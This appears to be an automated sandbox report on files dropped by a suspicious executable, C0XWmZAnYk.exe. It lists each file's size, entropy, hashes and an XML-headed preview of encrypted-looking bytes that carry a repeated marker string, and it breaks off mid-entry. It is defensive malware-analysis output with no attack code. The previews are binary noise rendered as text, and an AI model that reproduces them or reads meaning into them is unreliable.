              Preview:<?xmlp[...F.|f...!+W.E)a=.`....y.U.X%J...>.6.y.kf.s.....A.2.\.Iy........L-.(..B.....F.n..JYV....yx.J.9F....+.YQ=e....#=..-...5....@......:...%.e..Q.?.*.Tw#....ls-...`.d.a..A..:?..5.lF.'m..._y[.....=....|.R.D!!.A......3...t.(C..N...`"...0ac...>.>.x..).\.0A..e..dy.Ye....4..AZ".G.B3.D.2..E..)4.....l..q0t.8...n.]..a..6..\...{.C....EH....j.....O.....2&D...s.f.!AgqX.+p.Y....f..n......j4~t.......l...b..k..(&.@....4.".q....b.m.w.s(5..3...SK..#l;.b.0...t........"...8....I}.....&.M<...q..+CK...y.n.0.6.....J.2./e2Q'......@.C...J...:...u.S.bj.`......W..2.$......~m.........L...:....s.].<..6.6....^.l.=....d-..x.q|..?...W.j1.....O.y.?5.D..a....Y{.0;.....+...q.9......^..1.....R.3..(j.....0...r...a...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):853
              Entropy (8bit):7.693568252682512
              Encrypted:false
              SSDEEP:24:G2uOWF7TNqcbDK5OXgE5DzT/WJVHD240F5vd+bD:G6cNswwEtL+jhW8D
              MD5:9B86387BE82DE60B7B83BA6EFCE4CC86
              SHA1:18DBCD7A455D00E9A220EC937A4E8F3CE761B54E
              SHA-256:82D417DEDCC39348FE1E98D7D9228C8C1EFE00EC99D2302FA08580A14CA82E47
              SHA-512:B6A4EA28C7B27597B33F8DF2F6D6CE0E0DBA3584A75EF87F11D1EE65536AFBAA445573BEE22CC7FB86E91888C5174EBCF83425FC7C83358675BCC640790A6F43
              Malicious:false
              Preview:<?xml.&.....BI|.|..O..E....Z[y..7..d..d.d...h.. ...k.z.]..Z|.{s.sZ.......W..}..1rq2...P.....z#m..e.V.Mj.}...1.X.Em/...;.Md.8....S.f."T.......n....N*+7Jv...6.Oh...%Q....MU.b ...&....XTja.....u...+A..hT.......]w.!...4.$..T.d.........+..W..8<.Ip[..VMY*eK.....ax...Dh....*..O.O..&d.)u.'u.e~..{U../.r.@.^.g..-.3.0.".j..........H.t..2"<...A...A.@.K.:&.~..z....R.K .g4b...CN...O......v...0.k?.?..+._.dR..v.....e.4..?.......,..e.....L..g`..ZT zf~q(.;..0_t..o..`gr6-d.e.&.@.!....A.-.p...(...7/.h^C....q#.*....j"...*.G.x.[....Rt..(.x[9....~...........7.a..B....(:6.i.J1.....i..J.k5.f)|..mgjDo...w.G.N..P.G-.d...Y.d.xr....`.4..].h.?......(...M..V?........l.Rr..C.P.......2....v.._5..rL.l..g..t.",.&^C..+..H...{L;e....6...%w...5.".......?y.v....A..|.4.Z..h..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):912
              Entropy (8bit):7.740069458767962
              Encrypted:false
              SSDEEP:24:7IT+wujiMC6fV8DHTun9T5jUISNp+kJjYkVPB3LEyd+bD:7c+9iMmDHTQ965skzI08D
              MD5:024C6074500EA137062DD44E288A9DB8
              SHA1:40F22BDBCB2624CF921738A23463A3E3F3B4A660
              SHA-256:121BAB85E2524E97713B85B6C42C6E3A693638783D4C79D3A5C46F08E7B57E85
              SHA-512:52BC6B63ACB449CFE24B1F1E6DCDD6CA5886EB12E606322113CC1378A339EBF25CD428E6671EC76982F4BF1E7647F2CF7163C17FA2781301837FDBAF650928F9
              Malicious:false
              Preview:<?xml.3...*+.9w.w..r!..k.N.?.G.Y...x..r.jA.@....m..^.8.G..#....eN3....ve..|...BY:._gk..b.!e......h82..;..`MtA...Ct.B>...T.....a;.$:..&..8`.A..y.........x.d.S...sA.Q...h..9r..R..z06.......G..-e.T[.P....)..a..J.| ....3.., HJ.$.....,.FQ#.=...c.E..7.&.<..(..`.5.j3..I4....%ar.*.r...h.a..M.mi...Zt................l.....[.?.....f.}.2L.|..T... ..]x..T...K.`R.f...v.......]O..o.Gs ..8.#...$$.*#.8.D.K\....F.E.../.G.*..gQ...]..aV.W.Q38..eb9%cb.1{.w...1.G..(oS...?.rEy...Z.../.)8..Z$G.=........m1.~.0.`'y.....*..!.L+...`..[I...WR..n....S.:h!....`T.....Ro.P$.........L.Q.......As.8..s.?[..2Y.#pt.7......j.i..n....;....4....E.=.0I...T.........3.'|.K..O$.*AD...|..W...yDL9.....r....1.FV..^6.2J.kE.(M.t|....J...v...!.py.`.#....mlD.Z..Qu.l..Y=9....I).....m..0..._.0I...I.>..,.4.?_WX.i....;.....o....[....%#!(O.mE.f...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3310
              Entropy (8bit):7.941729492309148
              Encrypted:false
              SSDEEP:48:PSGisfcVo3lK6tJu28V18pek92r6IxrvXvAuf7qM1kXqDCSIsqvYlsUXhiq+2CuN:53ka8Gn8VKPg6qzfAucARiIdr
              MD5:CC2287B0D5BA23057A64C91550E2AFD2
              SHA1:6FA8EF0260A3CAD5D5B811F0F96B323AF92463B6
              SHA-256:221967C74BD34B1499DE0291E013AD858A1D652053C8FB8DCDD0C6546E5D9522
              SHA-512:012A88673E9CEC04C5214C3BD12E5B14ED01949FBD43DE0DF229DFDC5D0AA2E42FB1E7F4145669D91A42C019035011B15A66BE7DB79DF643BAB627841E274D1C
              Malicious:false
              Preview:<?xml..-V.e.f....q..{....9.n-Q5.K..SE.. k[..w.X.)..M.b.;ec........F9M.OQ.N........w[.>.U.....%VX.....r......x...p......>z%m.n..&...b.^......x./9.;D.<=6..(..+.....'.jG.N.hRP>S..6G....~'.d...J....=P!..R..m..J..ATrkmJh..w....\R......._..de.x..qw.... s..............W.....X.^......jMTXg%...imi..P+.....j2....;+Z|Q.9t9T-....S.".8.`.u.=.=.........n....5......SgU!...i....?.@)...-..........Y.H.[.....%.....`A........n.w.54w>.<...D....p9..\.)..+..6.$....d..t^.....V.......#SY.....S......(2p......^2.I....:le.So..{..K.C..4..z.9..g;...w'O.2.@...3...w.[!....B..].w.N.F@?...."......E.F.e.:#}:d.z..9..2.:w...c..){ .d.yP..+f.iT.rN.-.PW2)....+.B.HI...:......iv.'.j..a...t.........!{)$...l..<......e..E..t.3d...=...h.&.o.1^..8....<B..G...l]*[.'..)"..X...ZHM.....s.l..q.._a{...Yw..s...$..e........s~....eD..=....;.*.d.K...-q.a.....QB..1q...~\.T..}.]."W..%U.k....+J..8..{..mOh.J....b...%.........6G9..FB..../y..1..cg..T.$.mh|h..Msm1.......D"...y..U.e..l.96o../...y..E..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):910
              Entropy (8bit):7.750692245925806
              Encrypted:false
              SSDEEP:24:dVnP8Riuln7Sr3vduafcUq3Q7dBbw+N7xUHxLd+bD:dtur7KdugcUl7dBb3N7GRR8D
              MD5:732D9908081878D651D20283C48B02ED
              SHA1:52131A112946656BD1252D480883C8A0EDDBB556
              SHA-256:9DCE8A89D5588E28496F18B363A22F246DFCD8C77EB8A148186883EDFF96C67B
              SHA-512:FFF14263E8534E5F7AAE328E23ADA071E0215398F81AEA7B0135206545ED5D1457DA71EC166B1085D39499E02E04E45DC74534BF39F2D4786CDDF5C732606504
              Malicious:false
              Preview:<?xml..u......1.YT......-.....k.O.6..........1..T....k..yB`....|........\^i.....t]^.;.lf..!c+.9Ot..}.W.re!.i....-......u..??..k.[.'.gu\.r.......R...xpT..Rp...g6t......Z2..IP..p.w..m....B.,.}...C.|K...Q.y..,.z...Q.........|.....=......3...y......0/........7...e.6.x..P..8.2..\..i.O.r.....?H..c......(...(.g6..c.s)(..........Q..qf..P.R.J...J.E....x.AJ.f`..].<.)l+yL.C{}8..t0.VOk?..C.__.........E....@....V...#.:...,)....?E!)r.....A..x.(..0].J......L^...kA....%..v}...pZb.}...&.........g"S......1...1..A."?u..xFhS.....Z.>.OSY.qGM...........b;-c....p.a9..?.v...Y..D...E..bS.On....?....../..}.m9..Cj.3BK,......*.D.|V....<0K. q.JM...J.k9...C..i.. .../)..{*.Q.a'......$..|.8..|..m=...=.#.....&~4...../oWQC.>^M3..KJ).O?k.q!...s..h....{.L.L..6..yD..y!.Z../.............([r.]..[.Ws.s..01gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):941
              Entropy (8bit):7.7678698964382935
              Encrypted:false
              SSDEEP:24:wlRSaCrWEDf7q2kje0EvwzlcQRCWTIHDvoH9PbZU3SeKd+bD:wTSLK4f2p60EIzlcqTyDvetZU3Sn8D
              MD5:CCD5029C3F8B7160FB222A84658E652C
              SHA1:2A6E88F3EEB3B3D6149BE65B599437B0CE76B7E5
              SHA-256:DD274609E35D35742D048623EE35036626A97EF133518D5F9541090FE08A1E76
              SHA-512:E73A983F116741E3C77832A158DDE7FFD28FFBC25CF8AB732639E5565B38014F226EAEB43A2D0F503FEE707B106E010C4A104355E06800B75034BA816A8C5DBF
              Malicious:false
              Preview:<?xmln..m8....D.<wB.o..g...Gg.H.e...q0.l.r...)........}.F u:U.tZ.Cor.?da.....Co.J.f....D.........G.<.UW".......'O.sV...t....%........J.z...ua...4U...`...k.b..-r...(..*'....)..qC=..v"0.......^.G....X.7i.I.E?Rh...o..0.G..K.....y.....^.{..H"^.^.d."FB..PZ@$.@.:L..8P..4.,.....@.N{.K<..b=........d.-.l.."e..&....fL.2.D._.5...VLe.e&..'.QdK.)(.<...c.......m....~8...._e..-6.<X.3.Se....qJ+;40.U."...r\....#.E._.....r.E^..).....1&.R.c.....s..@..d....5..=,.+.....2Iq.5.d*..".s...u.(...`q.I.d........C]....6>....,..Q..c..6..`......9".ltJ...&H..6M?w.....tw..Ic.>,.Y.&.u..'*.L..l..t...J\...8.`.H..Kx.@ih9&......).a._y.b.96.......Dz..R..S.no..n[....wC...vOQ...C*.........6.h.....6<E..2../._.:z........Y........}....?.C...R..v..../m.6.4../$./....{.-b.L..l......XjM..$..U;..b.69.../.x..mp....I.o.`.G&.."-.f......4........e....J..7...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):787
              Entropy (8bit):7.7106883768743515
              Encrypted:false
              SSDEEP:24:/WdaeazlMUamnlicLSVvQFtkHxXghgZUiPd+bD:O4FdfEvQPkRYQUS8D
              MD5:7BBA6FBD5AD1A223FCAF7C831CB37D53
              SHA1:794D833273D47D645002117DD1AFC218A0A0D549
              SHA-256:75B8C6E466D0A9ECF1B8B59782437959A518F60D6C27F574EBBF3955A574D82E
              SHA-512:F800E18650736A2AF479086D41B9B8A03F19F2AEF3566397F606C421AE2F2FFF1484D490C4B678D7809C9F20B34C7AC7AA4D93E3F0C965FBA93655714A2F9532
              Malicious:false
              Preview:<?xml...FL..`.`.Q.........`.`Q.b....P.z..... ....q..l..4...c...9?.G.(...&.|eFV..r...kvibV.m..g.9....o.O(....q..n.?Y.....i..4...R..>.P.In.c..*9...nM...zpO?.4...U%g).t...g.]P.....&.N....&.....A..^T.`9Ap....`.....F~GUw:..r$m_........P].Y.@'J...YuV$.+..X@..Ng.$F..f.<..K.Z..#..m#...z...3.1.Qj....e......Z..j!.d.~......]...qcc.O.......5......?-tts...u..s5R.,(s;.B..@.....f.U.1.%M.NE..jZI..S.,....C.'.%...G*[.~t..8~M...KJT.5.....^s......(2p'.qk.x..m.N65.z.?=J.$.|S5.I/.=r.."..tr1...m.F.i....$.._..:o. .............0b.......{i..}@w.b.+.#in.O......o...l..\.w..7......._:..>....hX..L..d../7y...B"..K:.^|...k..1"....}..V...W..jJ..g]..g.w..E....S..*..#.X*@.q0.g....4......~n.[E.K.AgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):961
              Entropy (8bit):7.770040044489929
              Encrypted:false
              SSDEEP:24:gCI+f5lgk/YWA4s03VD4DXlCQqtqVeFef5ZvdRheZrZayed+bD:gCI+fXP/9q03xEHhegRheZrZa98D
              MD5:A63216F6C07532C0548A4365153C50BB
              SHA1:5C9802FD0EBD23A3388138BD1A2DEEFF4382A6E4
              SHA-256:C8B445ADD7A33C2389AA86F81470D3D457B4FA2ACDD1D74D67593CA5C24D8CFB
              SHA-512:402821BFDF38C65C5603828030587799C12643C6D0777540784E33DAB979CBCEDE1809967ABD6E952FACCD15E9F5AC6189D39E5172EDC24CBC6633EEE68D1F65
              Malicious:false
              Preview:<?xml...G..L..i...FS..b..q.."R]..6"G.?B..Pv>k_...kB....#..;...r.W...l......S.......L.2..9......~0.J.....z.P.x.....i..,..L..fw..}.o.....m.j.o.5.m...@0:...Fx..>..e.....6.}.....r.X.7+'.B.........D.[..K.aQ*V....QB.K...G..k,...T.<Ex......x.\.<~..M>G8..b0..?X\.:?.gp[.[..e.Wa.#..p\.8.]9o.K...M6bS.. .5.!..cd|.,..s.I..iM=W]"V....7.i..\o.-a)._.M.\....yD@%&..F.M9.R.e....+..A....NT..d.F......z..5x#xu....g\4i%...3.....+....`....2.|%....Wv.,.6>A..../......=...4..+._..~+.D#Mb....Ms...o...<....bQ.r...,P'.zX.E'....6..4.K5..y.....*D.*"...MF.....[.=u.T.3..q.L.........s..;.Vj..t{i...|.?c.F.b..1f.?g...v.Y.O..t.nn..l\k.8..&...L...M......I.7:.....L.."=.A.r1]zc.$.%8.NGm.|..Xo..=.4,..M_..<^...@.X<..*6!#.*G.&x6nE.].t5}5...,U=.+........$h,.2.K...)r..=..J........<..cJ....g.D.;.?R..h......h@..\.!.r2.....k.Ol......0...#T\..KZ.$.\.+..H......Pn.x'J.j.2.5....z.IgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1131
              Entropy (8bit):7.799610410794332
              Encrypted:false
              SSDEEP:24:BJ6iC6zWfU9hb1ZAXzBDb7Dje6RibDAXLbpkQId+bD:BJ6OxyVDfDje6iELbje8D
              MD5:45925843F1E5BD0AC6DBA81EA701FA2D
              SHA1:E8F947FCCDD2D9D9CFE5145EBA02EB55FCBA6F98
              SHA-256:84D589B75B49BD3D7858BE7BDD90E977A1D5438A81DBCC89972246CD85E00961
              SHA-512:284C3751D99016207DB6CEF70F4EE8D3305A79DAB27D1D8BBC4075849B43D56B8470C45DA2C6DFF2AA0DDF2028DFCF14EE1F9A2D9ECDB0EB475BDB71BE84B2CD
              Malicious:false
              Preview:<?xml.j..h..~.w...S.S..>E]V.P...=-..B.0..F.XDK...q.%&..|@..y..w..6......_.2....f.J^3..a.k.p...99V=,...P..$Q.M.....m.....~..O....*h....B.|..."y.F...cz.'Gc.23.L]N.=....Pp#.....C... l/./>..>.p...L......ft..E..........Mf...I..FQ...{...q.,"].4..7.}.....{..2M.t.+>..g....5"...9.../.H<..s..c.j2.Z<..;]....o..x.m..xo]..B.ce@NpN...N^p..q!_..(Z.....w+..S\.n...-C}m,...TG......-..e(.<.I?`-........wB...l.@.yvL..[...j8.!..Pn..]&.o.|K-Y.gG..2RJ...........7..fC.D$...V.q..wf...............39.vZ......>Uo.]..O.......@...,H....Y....?e;6....P..{..%}.Ih..Zo.{.B.*]L].....\+.. ........yL..X.\;c...U..i...vcl.....g..{.E..VS..=.~=q?.-d.qi...gKm..^.E...e..,.U.3.}-l.E..(-zv.....Y.....}........./.2..ND..b@/...gN.yZ.a.yKc/..[.=d......7m....(....J............/u.y.j........C'4.5;."%..&....x..X.Bt..yIb.6h.2.3=..RuB..:K.Z......cY.3......).Q.I...$huW....8.N. .".....c......ikY...z.5....#[Wm.m...)..N..4.b`.NS4]P).......j.LO3.wV..e....u.E..3c......b..D.d....P7.Q.....
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):987
              Entropy (8bit):7.798383413392451
              Encrypted:false
              SSDEEP:24:AhZSLzEKSsys4QhrogRFJQWZtyAP5fCpGNllzcgN7ZqJ3xVNd+bD:AmLzEiyQhvHZtB5ft37Ze3n8D
              MD5:0E755742C81731259070C6FACDE2CAAE
              SHA1:9AA74CCAB996E0DE10D752C37B3FC148516D249E
              SHA-256:269E0E1A6FF3161909DEDAAF6596FC2EB440D944FAFE9B9E3BF02A74A7BB1E12
              SHA-512:CCF8579954291B3EC9B3B139A733AD689529DD63212654ABE1B3F671AB818234E5817CF563B80C88D05D6F2563B953F94FD18FDC1696E893FCDE3EA6419522C5
              Malicious:false
              Preview:<?xml}...5...O......cm.N.{.a...'DK......,_'..W....~.\D.Z.b...P..#F.no..c]........#d.Y..t.z&..,8.h...X;..y...F...."i..v.u.b..-.K..........y.Wd....?....x.D..........fI\pD.......+.NNM.......$...=...:... q(7...dH....c....uqN...J...q..............J_E...2.dy.p#........<.;..m^v.x.......?'....5.j.{..8H.H..=F....A..,+j..9H.t.-....tz...Z=xa..k!.`..2G... ....o`._....x...^.0.....aJc^7..Ig;......K.....G.WJp..._.K.M.%r...7`..[..........6.....}.Xa?.\(.............`<.T.G..........$.........i.f..S.o1... M...gB^03..g]....&b^O...e....*...U'...F..p.2.......^}..&..........r...G..Ql{.0C}.A....!o...EV.G..s.L...2...r......<4}.....f....s.M.-........Eq.. .xm...K...D.=/..O..i.$)..'...#....H.3OB?..n...8..`.cN!..%...%....a..k......0........~(..9..9....z5"..C.......{.%..s.;.t.....I6...B.*...?.{.C.....O.qo.e.#_.m..D...\Z..>hO..>.c....<.}9)...].d..(...K.B.j.d..<.bpu1wG.4...-..0.n-......{gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):857
              Entropy (8bit):7.719329017536104
              Encrypted:false
              SSDEEP:24:YG6kjHLIziG/Ls1bovSavUHDqvHU2MIzsu50YHRLSd+bD:76S0iWg18vHDs27zsuGqU8D
              MD5:FB71E9BE277E4C593B4D041D3C5D62A7
              SHA1:D03554D9B82834671B3A3EF63FBC289732EB182B
              SHA-256:A1702E5AF6218DCAEA5C1FCCBC27AAB8A10868086BBBC57659CB93B686D65F4E
              SHA-512:88C9C95D732C8701CA6987FDBBD4CBD4965EC841779EF2B55BA068D42990A5B2E0ACA6629739F35BD8D3317F63C986FCC16ADD2C55DDC2201F7E3D944DF087A4
              Malicious:false
              Preview:<?xml....<5.=..C@..a...Q.R..Z_.......S;..k7....B..;....f..EO.#..+.m:.....d...U..GK..":..dI...w!.S.6.nB......o.J-s...j.C9.KATX.nD..s...o.c?......tf5..S.l...Z......v..f..L+.S...|)&......:..:.p92..*..WY.R+..|.w.?.d.......5.@c.Cw.<.,..A.yrk........nV..3&o|1.."...8D.{.W2...}.#:.(YV..ZF.K._L{....._Wq...........#aa..t.y.........$...Wj.-z..H..f...\&D.... ..^.j]{.}5...w.C.S:..2..CHe....o.d...g.J...#...3I.N-YU}(..z^.=....M.........T>...%...L..5/Hn../......ZB.k...^.rMa.6.A>....9.g:.......=.YH...8..-c._|.s.w8......-f.L.&......t..?.}x/..f..n.'I.N.{R]VM....c..C.="D\....]|.V.]..!.\....f.T.f.. .....:..<....MP.....K..\iD~}".Z....C1......................@s]..L.T.:O.Q.CRK..2"7..EL..._u...3...8......+..t...i.."......-c+C.....2."..-w?J..^.n.q..:X5...6.x9gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):859
              Entropy (8bit):7.769217944084421
              Encrypted:false
              SSDEEP:24:yDvbtnqQ4VSwHtGrHB9+SK3V0jKHlZWluwdTd+bD:SJnqQ4vNSwlGgZWw68D
              MD5:A655306208E73484906C79FC4FC2956E
              SHA1:BD59ABC8AF72A13D05731754A8509DE3F17CDB37
              SHA-256:A944DE169B41D4387531116E7B815A325F7FA1D4ABE8261A2510E77829B1E649
              SHA-512:8422356B49B36D0AAE45B44388FB9C6FB9724B5F89B1A099F286ED134C32C23769D5483B851F10438D7E1B5D794B15DE8AE67A79F51D6CDC305673D698D50A76
              Malicious:false
              Preview:<?xml.[..p.m.v|+.....5.(M.p...r....w.\Q..O...`<....2}..6..1RUOBL.:...:".......a..#.Q4......u~.v._..`w.].T...z......@.u.........})s.*..t|pM-......}..]/..V^SV...QT..G2..r......z`.H.b....&..#.........`...F:5..l,iP7m..,.....1t..+.."......P R..z...T........D..)._.:.V..w2{.U_.y......A.n.....D...o^1....W...m>.......".....H.Xl.u]......0%'..]f.Xu..:b.....Y..*2e..S...1Mx.L{..........."...gh..WJ....j.!......4Gf@-.....kD......\..E8......$`.?.+.F..w.vXNt90.....z....:.|..qR|........j.=.Z.u..XN.@.Gj.e...6..Z."...........w...)..H(..*..Qk.........X.....?,{~A.X;].yo.._D.,c6..A..b./....l.S.m...%..g.v...+....o:..1.m.+.].A.yaE..-..h...i3.!.....)f\ 9.J.......0@..;...y....,.Q.".X. 9..0Er..|............../ze...e.WM[.,....T...t`'P+o..q..Z.1....<J/C...0A...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):725
              Entropy (8bit):7.65767459829851
              Encrypted:false
              SSDEEP:12:XiBj8sRt6JJbNUTFnAyA8EIx65irWR1YjAFdmy6WU2t+vLmydxa3cii9a:XiBIsRIJ1yAyA8EH56jA/J6WUEVyd+bD
              MD5:07E2DD57380781CEB8FEEA6CAE2EF815
              SHA1:117F7CA64D6D681A73743B746AEF9F958A461CC7
              SHA-256:E2FF5CAE125406CB19FF92EA3B3649598241B1D5EC56BA0BF0440A0D93367513
              SHA-512:B6A28F387E835F9B6D98BC0D84CA2AFA9DE4AE0FF25D6E7BA5121FB249168E25D36FADF1310FF1E2D5D7B9E68C237D68904967BD37AA6600DFAF1796BF2EB17D
              Malicious:false
              Preview:<?xmlFt.[..].*1.'ogW]/...\.`.G.Z..=...l.:.&..@..7*...`Q.N|<...R.C..we*.ipj.-.3.b.2.C.x.s....0....<.....=.,(\H.js2W......|....BxI..uV.Lp..RHO...C.f.r.K...K`....J.......y:....>..&........y....p9..-..\S...>.E.SG.8.0%..\P.....].r..1...%[...Y........(N......8..p$.E_e/..&.G1]$.[,:.#8..T. ..-p.tQ -.vE\-Ad@....[..o.Bi...}..G.....m.z.....^......-go..c#......#..BB......#b...w.b....5..?....`2x.....:.....Wm;.......(.vDP$..^.K.R.......W~..D..\O...X..n..Zz......p.z0.....l0zD%cV.j...d.x...&...M.=.(*....K....l.2..s.G...".f.Nb8=.&AqV9m.:._.H..jxsh.e!..c..7.86.O\n...ro$u......M...H%.u?..N".i3...B..n.k.....c~.xS..;.d9h..5u".. D.RO.e.g04..egigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1175
              Entropy (8bit):7.806089253101827
              Encrypted:false
              SSDEEP:24:vrVk5NfyNteb82j1sN+HK89ZfYY/Pb785rte0CrPUqFULsHhaAbAlLd+bD:eqteeN+HK8zYY/kPMd4sHhav/8D
              MD5:C8ABCBEAE3199C37C879996DEBCE1FAE
              SHA1:CBCC49F73574809D04D2069DA9C97CB1397651CF
              SHA-256:34C29E260CA93625B379B507F4D8A21CC040A139BD18D6DFD50CB3709176DD67
              SHA-512:80DBEB090A90E39ED401ED004AF3FC0B6904EB6E1511CDB8CFFEA4C2C478845F970220AB48EEE21CD680D48D3A16DD84C9DC6BEDC3ED969482DD4937F03B2DF2
              Malicious:false
              Preview:<?xml....Py.......>.!n.=....H%f[y&..E..b.......N..};+w......k/Xm....P.d....'.`...... .4..%..._."..^..](..W...3.{w.."h.dB.R5-.E.6t...G..1a.W.L...z....Z..!.cM..I8y>S....Y...V.M..D!..<O.@.p..wD..j....F....4RH[.....5..8...w_.L.b?..I&n.V...`j..R.|.....z..e......1....N*.._#.....D..+..V...6.#..{...t.q...LV.......*..G.]'...2.,w..K!.(D:...h.....^#v..o.k...r1r^..i...hvPa..s.M.....>..I~..:)a`.MX8..m..+W..@...&.@..Ob.Z~.4.H.$...kx...)..S.S..F6.A....4Ow.....3....w4\ca:...tMJ.^&...y<6.....>....7.%..p@h...*~..^!#.k.u..!}..n.........*..L.....k.h.b!KG.>....;..n.X`V|up.2..c.BR.g...1Q~...>...CG..}....P...2EM@EX.[t...O.YR}.....D+Qk.....OTz...4;.k.9z..CD.......).QI.V+..JA..9gr.^..[.$$...]`H2.m.......e'\..`.[.....'A..vo...`..t5.z...s.lg;.2D..o}.3.%6../3..k..-.V.y.=.[p>..6.B.......e...M.d..=.-....L..f`l.t#G...]....d.:....b8.......J.d.b.........0.p._..V...#....9..9/...A.9N..y...t.....c'.....Q6z..$b.....mX.\C...I...> .m..-a.......4.O_..E.. .u.zx....`..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):724
              Entropy (8bit):7.688935687685139
              Encrypted:false
              SSDEEP:12:3gKJTXFQpPBF5zPhtfo/7BtLWykSqKwvxMFY68Zk8d1G/O7Y6n7QfzdJSzW0dxan:QeX2dTRPsPJd0pMFY6AkvSsfPiW0d+bD
              MD5:4A1BDF636B1DA94C8B11B26012284575
              SHA1:545666731905890AC4CFF61DC0F1362608DC0E56
              SHA-256:B9764BF87107163DB99B784D7BEF96344EE1982F06B2351A02D18E745A69A0C6
              SHA-512:834A8DF20242930948BE7B7822433FBBB518A922922D0318757D0D777B05E1F5958C675FF36A7AB47821BA37BFBD711FF3C5BDDFBE8B184193B018FB22901982
              Malicious:false
              Preview:<?xml`..Y....e...p..x.C:F]m.P..+...".%.S..S........S!@.o..8Z.W...v.d}O...T<0..g..........E.?..6{.}H..s...p...u..G..".2./......cIo.%g...M.%..k."H<...m\..e.....K.6T....m.........c....k...)...^H.x.(+...."..p....R.3..&.c........4. ....{.....J..w}.....j..z.i.B.-..G...]v.oiV.Q,CD.|.m..X.t....z)....kaY..{N.}...4.V...N]..lL.......f..|...!.....>.."...TzVpIL.......`:..L,..Wa.J..Q.&...N+UwW.lB2.b.4.D..L@...?...M.j../...F...a....[.....(EB.NS'.J.B...L+...r..v....{&.Rx..iZTn..#.-.o..^...c.|.K.K.j..?:.g.t..J.....Ad..-.kO.1..0..WS0p(..?~ }.@.h..c.k.r`uqSa&Q7.7..>!_.k.4.}..m.Sb..|a.L.6.NE..#..>p..\...lh.q...46...z:..;..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):746
              Entropy (8bit):7.740759085200439
              Encrypted:false
              SSDEEP:12:ME51l5W69u1Su2yTWC2+oq7M+JZCACtoxlqy3GQ+tzZ7qZgAnlz8qTI4mDOmE7qh:V51lPnnC2Q7pILtSX3WtdAnp8u71mF5X
              MD5:95355FF0A04143C94B87C04A2ABDB2FE
              SHA1:6080A9A728F5A1DE27233A6A1349AFB5A77F2718
              SHA-256:7B2A7F51EF29D9F8E3991DDA5CBDBBC4D9581F00E73998D44B5F8ACEA5062B7C
              SHA-512:218CEE92C6CABF601993F9DC214131BA7A2C644631FE1DFC8D97CBD9E630B3844D0208C788599CD3F9B1D387494392BF1EE41ECEF63C6ADAADEB1DE57DE42B0E
              Malicious:false
              Preview:<?xml.BNL*..........\m...b`...l.P{S...K..l...).......K...@P.Gh+.n}.L2...t..}&}..A...AR.cY..S<..&.{a......X56d...V*.o}&......\.[.J...J2...^..S~A.ND...%j....@..k`.E!c..D.|.....l.W..P.....Z..........A.#8....:W.....i.........>....o..z.'....C.^S2.T%....j..5.o.V..U..lR..$.G...<GW...Z-FpO._]3..e...S..'I]......a.x.2.*.).<.......x....(..g.p..K.ZR...(....._O.%t....NUO..E.(,..m..._tp...i....Dw..P9p9.....c|!..O.+X....$z..........;$.....[.[.Xs..9.*D.%;s..1..G.S..qS.u...#=.!.sD..]......}.(2 ..A....0..G...>y~.n.pC.r...w...g.....:.h......b..6XX..z..qj>.~.I.(h.-w..0...m.[|9.......(5.._.,'.>../+.."8...%6...../.z..x.......U.3.{..'G..p.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):857
              Entropy (8bit):7.730561671380414
              Encrypted:false
